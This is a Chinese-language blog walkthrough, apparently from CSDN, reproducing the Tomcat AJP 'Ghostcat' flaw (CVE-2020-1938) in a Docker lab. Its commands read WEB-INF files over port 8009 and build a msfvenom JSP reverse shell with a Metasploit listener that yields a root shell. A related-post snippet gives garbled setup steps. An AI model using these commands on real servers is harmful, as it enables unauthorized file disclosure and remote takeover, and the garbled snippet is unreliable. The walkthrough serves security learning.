CVE-2020-1938 漏洞复现

已于 2022-05-21 12:46:52 修改
阅读量3.3k 收藏 16
点赞数 3
分类专栏: 漏洞复现 文章标签: tomcat apache java
于 2022-05-21 12:40:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48799157/article/details/124889366
版权

0x00 漏洞描述

Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。 Apache Tomcat 7.0.100之前的7.*版本、8.5.51之前的8.*版本和9.0.31之前的9.*版本中的Tomcat AJP协议存在文件包含漏洞。攻击者可利用该漏洞读取或包含Tomcat上所有webapp目录下的任意文件,如:webapp 配置文件或源代码等。

0x01 影响版本

Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31

0x02 环境搭建

1.进入docker目录下的tomcat/CVE-2020-1938

2.启动 sudo docker-compose up -d

3.查看端口 sudo docker ps -a

4.进入环境目录 sudo docker exec -it ec1b03d2b457(id)  bash

0x03 漏洞利用

一、文件读取

1.下载POC检测是否存在漏洞

git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

2.尝试读取8009端口下的web.xml文件

python CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.47.129 -p 8009 -f /WEB-INF/web.xml

 

3.在tomcat/webapps/ROOT/WEB-INF目录下创建一个test.txt文件,内容是helloworld,尝试访问试试 

echo helloworld > ./webapps/ROOT/WEB-INF/test.txt

读取test.txt

python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py -p 8009 192.168.47.129 -f /WEB-INF/test.txt

 读取成功

二、文件包含getshell

尝试了一下不懂为什么文件包含不起作用,换一个POC就可以了

git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/

1.首先使用msf生成一个java木马

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.47.129 LPORT=6666 > shell.txt

2.将生成的木马复制到tomcat目录下,模拟我们已经将shell.txt上传

docker cp /home/kali/桌面/shell.txt ec1b03d2b457:/usr/local/tomcat/webapps/ROOT/WEB-INF/shell.txt

3.打开msf进行监听

use exploit/multi/handler

set payload java/jsp_shell_reverse_tcp

set lport 6666
set lhost 192.168.47.129

run

 4.访问shell.txt,使shell.txt发生文件包含

python2 "Tomcat-ROOT路径下文件包含(CVE-2020-1938).py" -p 8009 -f /WEB-INF/shell.txt 192.168.47.129

 最后成功反弹,权限是root

weixin_48799157
关注
  • 3
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CVE-2020-1938漏洞复现及原理分析
Finlinlts的博客
08-23 1808
漏洞影响范围包括 Apache Tomcat 6 Apache Tomcat 7 < 7.0.100 Apache Tomcat 8 < 8.5.51 Apache Tomcat 9 < 9.0.31 这里 使用Apache Tomcat/8.0.15 版本 复现1,利用msf自带该漏洞的POC进行验证 配置相关参数 验证成功 复现2,在window平台验证POC,https://github.com/YDHCUI/CNVD-2020-10487-Tom...
ppt修复无法读取_CVE20201938 Tomcat 文件读取/包含漏洞复现
weixin_39975900的博客
12-01 652
0X1漏洞概述日前,长亭科技安全研究人员全球首次发现了一个存在于流行服务器 Tomcat 中的文件读取/包含漏洞,并第一时间提交厂商修复。2月14日,Apache Tomcat 官方发布安全更新版本,修复漏洞。2月20日,国家信息安全漏洞共享平台(CNVD)发布安全公告,该漏洞综合评级为高危,漏洞编号为CNVD-2020-10487,CVE 编号 CVE-2020-1938漏洞影响...
tomcat ajp协议安全限制绕过漏洞_Apache Tomcat文件包含漏洞(CVE20201938)复现
weixin_39999586的博客
12-04 998
一、漏洞背景2020年02月20日,国家信息安全漏洞共享平台(CNVD)发布了关于Apache Tomcat文件包含漏洞(CVE-2020-1938/CNVD-2020-10487)的安全公告。Tomcat作为一款免费开源轻量级的web应用服务器,广泛应用于并发量不是很高的场合,Tomact默认端口8080用于处理http请求,Tomcat会监听AJP连接器的8009端口,用于与其他We...
Tomcat 文件读取/文件包含(CVE-2020-1938)漏洞复现
一纸荒芜的博客
04-12 1258
CVE-2020-1938漏洞复现
SpringBoot解决Apache Tomcat输入验证错误漏洞
最新发布
培根芝士的专栏
07-15 1117
ApacheTomcat 输入验证错误漏洞(CVE-2024-24549)CVE编号漏洞描述Apache Tomcat是美国阿帕奇(Apache)基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。Apache Tomcat存在输入验证错误漏洞,该漏洞源于HTTP/2请求的输入验证不正确,会导致拒绝服务。修复方案目前,官方漏洞修复版本已经发布。建议用户升级到安全修复版本: 8.0.x 用户升级组件到 8.5.99 版;
CVE-2020-1938漏洞复现(文末附EXP代码)
Vitaminapple的博客
05-31 1万+
CVE-2020-1938 Apache Tomcat 文件包含漏洞复现 1 环境搭建 1.1 Vulhub靶机搭建 1.1.1 环境安装 (1)安装docker $ curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun (2)安装Docker-Compose $ pip install docker-compose #如果没有pip需要先安装 $ yum -y install epel-release $ yum -y
CVE-2020-1938漏洞复现
Ch_an_ger的博客
06-18 1799
一、漏洞描述 Apache Tomcat服务器存在文件包含漏洞,攻击者可利用该漏洞读取或包含Tomcat 上所有webapp 目录下的任意文件,如:webapp 配置文件或源代码等。 二、Tomcat任意文件读取漏洞 Tomcat默认开启AJP服务,运行在8009端口,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web上的任意文件。 tomcat在接收ajp请求的时候调用org.apache.coyote.ajp.AjpProcessor来处理ajp消息,prepareRe
【网络安全---漏洞复现Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细)
m0_67844671的博客
09-12 1万+
Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细);Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。AJP(Apache JServ Protocol)是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。WEB服务器通过 TCP连接
【网络安全---漏洞复现Tomcat CVE-2020-1938 漏洞复现和利用过程
m0_60607371的博客
04-06 1114
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2020-1938:CVE-2020-1938
03-20
CVE-2020-1938 工具仅用于安全研究以及内部自查,禁止使用工具发起非法攻击,造成的后果由用户负责 通过测试研究发现,该突破危害及其严重,涉及非常广泛,如果发现建议立即进行修复 apache-tomcat-8.5.32.zip测试tomcat 验证工具-1(有BUG): 任意文件读取 java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 file /index.jsp 文件包含 java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 jsp /index.jsp 打包方式:在目录tomcat / ajp-bug执行mvn clean compile assembly:assembly 来源: : 验证工具-2
漏洞复现笔记(CVE-2020-1938
weixin_72760965的博客
06-14 323
cve-2020-1938是一个出现在Apache-Tomcat-Ajp的文件包含漏洞,攻击者可以利用该漏洞读取包含Tomcat上所有的webapp目录下的任意文件,如:webapp配置文件或源代码。对于处在漏洞影响版本范围内的 Tomcat 而言,若其开启 AJP Connector 且攻击者能够访问 AJP Connector 服务端口的情况下,即存在被 Ghostcat 漏洞利用的风险。通过nmap扫出开放端口:8080,8009,并且8009端口的AJP协议是开启的。然后直接通过exp读取。
CVE-2020-1938任意文件读取漏洞复现
热门推荐
weixin_45715461的博客
05-30 1万+
CVE-2020-1938任意文件读取漏洞复现
CVE-2020-1938 Apache Tomcat 文件包含漏洞复现
weixin_43102772的博客
03-09 5384
CVE-2020-1938 Apache Tomcat 文件包含漏洞复现
Tomact_CVE-2020-1938漏洞复现
08-31
复现Tomact_CVE-2020-1938漏洞,可以按照以下步骤进行操作: 1. 下载POC:可以使用以下命令下载POC文件: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 2. 在攻击机上搭建环境:确保攻击机上已经安装了Tomcat服务器,并且版本在3.4.3以下,可以使用以下命令下载并安装Tomcat 3.4.3版本: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 3. 配置Tomcat服务器:在Tomcat安装目录下,找到server.xml文件,在<Connector>标签中添加以下内容: protocol="org.apache.coyote.ajp.AjpNio2Protocol" secretRequired="false" 4. 启动Tomcat服务器:在Tomcat安装目录下运行启动脚本,如./catalina.sh run 5. 复现漏洞:使用以下命令触发漏洞复现: python3 file_include.py -u http://目标IP:目标端口/ -p /WEB-INF/web.xml 以上步骤可以帮助你复现Tomact_CVE-2020-1938漏洞。请注意,在进行漏洞复现时务必遵守道德规范,并获得合法授权进行测试。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [CVE-2020-1938 漏洞复现](https://blog.csdn.net/weixin_48799157/article/details/124889366)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [CVE-2020-1938 Tomcat文件包含漏洞复现](https://blog.csdn.net/qq_49279082/article/details/129018726)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值